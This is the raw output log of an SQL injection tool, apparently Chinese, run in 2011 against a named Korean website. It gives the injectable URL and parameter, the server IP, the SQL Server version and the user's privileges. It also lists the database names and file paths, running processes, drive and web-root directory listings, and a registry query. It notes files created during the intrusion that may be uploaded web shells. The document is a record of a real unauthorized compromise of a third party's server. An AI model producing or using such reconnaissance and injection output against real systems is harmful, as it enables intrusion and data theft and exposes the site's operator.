■漏洞信息:============================================================
 ・URL:http://www.medicompr.co.kr/new/vpr/ucc_view.asp?mcode=05&scode=04&MI_IDX=292
 ・页面标题：馆傈孤厚 - 全焊雀荤 固叼哪 - medicom
 ・参数:mcode=05&scode=04&MI_IDX=292
 ・方法:GET
 ・类型:Numeric
 ・利用方法:And
 ・脚本语言:asp
 ・IP:121.88.6.74
 ・数据库:SQL Server
 ・HEAD:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 04 Apr 2011 10:12:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 44557
Content-Type: text/html; Charset=euc-kr
Expires: Mon, 04 Apr 2011 10:11:41 GMT
Set-Cookie: ASPSESSIONIDSSBRCCST=PNBKHKLAIDMGAELHCIIBPPGA; path=/
Cache-control: private



■数据库信息:============================================================
- 数据库名：mediartcompr.co.kr
- 用户名：mediartcompr.co.kr
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：B7C1FCE4C9ED470
- 服务名：MSSQLSERVER
- 系统用户名：mediartcompr.co.kr

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 1

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
goodnight	d:\MSSQL\data\goodnight_Data.MDF	
master	d:\MSSQL\data\master.mdf	
mediartcompr.co.kr	d:\MSSQL\data\mediartcompr.co.kr_Data.MDF	
medicompr_backup	d:\MSSQL\data\medicompr_backup_Data.MDF	
model	d:\MSSQL\data\model.mdf	
msdb	d:\MSSQL\data\msdbdata.mdf	
Northwind	d:\MSSQL\data\northwnd.mdf	
pubs	d:\MSSQL\data\pubs.mdf	
scman	d:\MSSQL\data\scman_Data.MDF	
stylepocket	d:\MSSQL\data\stylepocket_Data.MDF	
tempdb	d:\MSSQL\data\tempdb.mdf	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
SQLAgent - Generic Refresher	sleeping	B7C1FCE4C9ED470	2044	AWAITING COMMAND	SYSTEM	
SQLAgent - Alert Engine	sleeping	B7C1FCE4C9ED470	2044	AWAITING COMMAND	SYSTEM	
SQL 孽府 盒籍扁 - 俺眉 宏扼快历	sleeping	B7C1FCE4C9ED470	3260	AWAITING COMMAND		

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
B7C1FCE4C9ED470	SQL Server	SQLOLEDB	B7C1FCE4C9ED470		B7C1FCE4C9ED470	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

Dir of D:: 

DB_backup\
medicompr.co.kr(old)\
medicompr.co.kr\
MSSQL\
RECYCLER\
System Volume Information\

Dir of D:\medicompr.co.kr: 

admin\
blog\
facebook\
fbapp\
fkiller\
game\
m\
mail\
medicom\
medicomaward\
medicompr\
new\
news_search\
one\
pop\
prone\
research\
rss\
scapp\
VPR_N\
VPR_NN\
VPR\
blog_test.asp
default.asp
intro.asp
login.asp
T_MEDICOM_SPEECHDB.mdb
visit.txt

■reg query "HKLM\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots" /V "/"
Dir of D:\medicompr.co.kr(old): 

ktf\
ktfcheck\
medicompr.co.kr\
medicompr\
one\
pop\
prone\
report\
upload_folder\
VPR_N\
VPR_NN\
VPR\
WCG\
default.asp
index1.html
index2.html

Dir of D:\medicompr.co.kr(old)\medicompr.co.kr: 

intranew\

Dir of D:\medicompr.co.kr(old)\medicompr.co.kr\intranew: 

default.asp

Dir of D:\medicompr.co.kr(old)\WCG: 

2009WCG.wmv
ceosign.jpg
wcg2009.htm

■正在获取文件属性：
文件名:D:\medicompr.co.kr\123.asp

■正在获取文件属性：
文件名:D:\medicompr.co.kr\123.asp
文件大小：45336064
创建时间：20110404:213016
■正在获取文件属性：
文件名:D:\medicompr.co.kr\1234.asp
文件大小：45729280
创建时间：20110404:222027
■正在获取文件属性：
文件名:D:\medicompr.co.kr\uc_view01.asp
文件大小：310784
创建时间：20110405:115528

■数据库信息:============================================================
- 数据库名：mediartcompr.co.kr
- 用户名：mediartcompr.co.kr
- 版本：Microsoft SQL Server  2000 - 8.00.2039 (Intel X86) 
	May  3 2005 23:18:38 
	Copyright (c) 1988-2003 Microsoft Corporation
	Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

- 服务器名：B7C1FCE4C9ED470
- 服务名：MSSQLSERVER
- 系统用户名：mediartcompr.co.kr

 ・当前用户权限：
sysadmin(sa): 0
dbcreator): 0
bulkadmin: 0
diskadmin: 0
serveradmin: 0
public: 1
db_owner: 1
db_backupoperator: 0
db_datawriter: 1

 ・数据库信息:
db_name	filename
----------------------------------------------------------------------------------------------------
goodnight	d:\MSSQL\data\goodnight_Data.MDF	
master	d:\MSSQL\data\master.mdf	
mediartcompr.co.kr	d:\MSSQL\data\mediartcompr.co.kr_Data.MDF	
medicompr_backup	d:\MSSQL\data\medicompr_backup_Data.MDF	
model	d:\MSSQL\data\model.mdf	
msdb	d:\MSSQL\data\msdbdata.mdf	
Northwind	d:\MSSQL\data\northwnd.mdf	
pubs	d:\MSSQL\data\pubs.mdf	
scman	d:\MSSQL\data\scman_Data.MDF	
stylepocket	d:\MSSQL\data\stylepocket_Data.MDF	
tempdb	d:\MSSQL\data\tempdb.mdf	

 ・SQL Server用户名列表：
用户名		角色		安全编号
----------------------------------------------------------------------------------------------------
dbo			08  6 2000  1:27AM	
guest	.	.	08  6 2000  1:27AM	

 ・数据库相关进程信息:
程序名	状态	主机名	主机进程ID	命令行	NT用户名
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5
SQLAgent - Generic Refresher	sleeping	B7C1FCE4C9ED470	2056	AWAITING COMMAND	SYSTEM	
SQLAgent - Alert Engine	sleeping	B7C1FCE4C9ED470	2056	AWAITING COMMAND	SYSTEM	
MS SQLEM	sleeping	B7C1FCE4C9ED470	3860	AWAITING COMMAND	Administrator	
Internet Information Services	sleeping	B7C1FCE4C9ED470	2336	AWAITING COMMAND		
Internet Information Services	runnable	B7C1FCE4C9ED470	2336	SELECT		

 ・链接的服务器信息:
服务器名	服务器产品	提供者名	数据源	位置	服务器网络名
----------------------------------------------------------------------------------------------------
B7C1FCE4C9ED470	SQL Server	SQLOLEDB	B7C1FCE4C9ED470		B7C1FCE4C9ED470	

 ・数据库用户登录信息：
用户名	密码HASH	数据库编号	语言	时间1	时间2
----------------------------------------------------------------------------------------------------
取记录数失败，使用设定值：5

------------------------------------------------------------
正在获取数据库 [mediartcompr.co.kr] 的表名……
一次性获取失败，正在批次获取……
批次获取失败，正在逐条获取……
取记录数失败，使用设定值：5





